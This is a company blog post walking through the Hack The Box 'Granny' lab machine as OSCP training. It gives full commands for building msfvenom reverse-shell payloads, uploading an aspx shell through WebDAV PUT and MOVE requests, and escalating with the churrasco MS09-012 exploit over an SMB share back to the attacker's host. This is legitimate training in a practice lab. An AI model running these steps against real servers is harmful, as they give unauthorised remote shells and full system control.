Road to OSCP - Hack The Box Write Up - Granny

Blog

22
- April
2020
Posted by: Ángel Guzmán
[Cybersecurity & hacking tools and techniques]
Road to OSCP - Hack The Box Write Up - Granny

Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.

In this series of articles we will show how junior evaluators complete some Hack The Box machines in their road to OSCP, a well-known, respected, and required for many top cybersecurity positions certification. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems due to poor configurations.

Let's start with the fun!

Granny

Initial Foothold

Nmap itself has discovered a wide arrange of risky http methods allowed by the host.

With the method PUT we can upload an aspx reverse shell. It is important to add the extension of the file, but the server will not let us set it to aspx. The solution is to use the MOVE method to assign it the aspx extension:

IMPORTANT: To upload a binary file using curl, we need to use the --data-binary flag.

  1. Create payload. msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.31 LPORT=12345 -f aspx -o shell.aspx
  2. Upload it as text file. curl -X PUT http://10.10.10.15/peng_shell.txt --data-binary @shell.aspx
  3. Assign it the aspx extension. curl -X MOVE -H 'Destination:http://10.10.10.15/peng_shell.aspx' http://10.10.10.15/peng_shell.txt

We get a shell as: nt authority\network service.

Root

After a year looking for a exploit that works, MS09-012 (churrasco.exe) works! After downloading it and unrar it, we renamed it to exploit.exe.

To execute it on the victim machine we need to create a local SMB share:

  1. On Kali: impacket-smbserver smbDir $(pwd).
  2. On the victim machine: \\10.10.14.31\smbDir\exploit.exe whoami.

We can now execute individual commands as root, but we still would like to have a proper shell.

  1. On Kali: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.31 LPORT=6969 -f exe > shell.exe.
  2. On Kali: ncat -lnvp 6969.
  3. On the victim machine: \\10.10.14.31\smbDir\exploit.exe \\10.10.14.31\\smbDir\shell.exe.

Note: It takes a little while for the shell to arrive, but we do get a shell as root.

tags
Ángel Guzmán/Junior evaluator

Degree and Master in telecommunications by the University of Granada, specialized in telematics. Joined jtsec in November of 2019 as a Junior cybersecurity evaluator.

Since he joined jtsec, he has participated in several internal hardware hacking projects, while also receiving training about the LINCE certification.

His main motivation is to learn, from small tools for his daily work to new technologies.


Contact

Send us your questions or suggestions!

By sending your data you allow us to use it to resolve your doubts by sending you commercial information of interest. We will delete it when they are no longer necessary for this matter. Know your rights in our Privacy Policy.
RECENT POSTS
jtsec achieves pioneering accreditation for MEMeC cryptologic evaluation
Jan 17, 2025
jtsec achieves pioneering accreditation for MEMeC cryptologic evaluation
jtsec & Applus+ Laboratories at ICCC24
Nov 14, 2024
jtsec & Applus+ Laboratories at ICCC24
How to use the CCN product catalog to improve your company's security
Oct 14, 2024
How to use the CCN product catalog to improve your company's security
Common Criteria Statistics 2023
June 17, 2024
Common Criteria Statistics 2023
How to enter ENS category high, stay in the catalog and add new versions of my product
April 23, 2024
How to enter ENS category high, stay in the catalog and add new versions of my product
jtsec - Our LINCE 2023
Febr 6, 2024
jtsec - Our LINCE 2023
We wish you a happy and cybersecure 2024
Dec 19, 2023
We wish you a happy and cybersecure 2024
How to Prepare Your Products and Services for the Quantum Era and Ensure Their Certification?
Dec 14, 2023
How to Prepare Your Products and Services for the Quantum Era and Ensure Their Certification?
How to include your product or service in ENS ALTA.
Oct 31, 2023
How to include your product or service in ENS ALTA.
Certifications and cybersecurity methodologies are generating interest among companies and organizations at both the national and international levels.
Sept 19, 2023
Certifications and cybersecurity methodologies are generating interest among companies and organizations at both the national and international levels.
CATEGORIES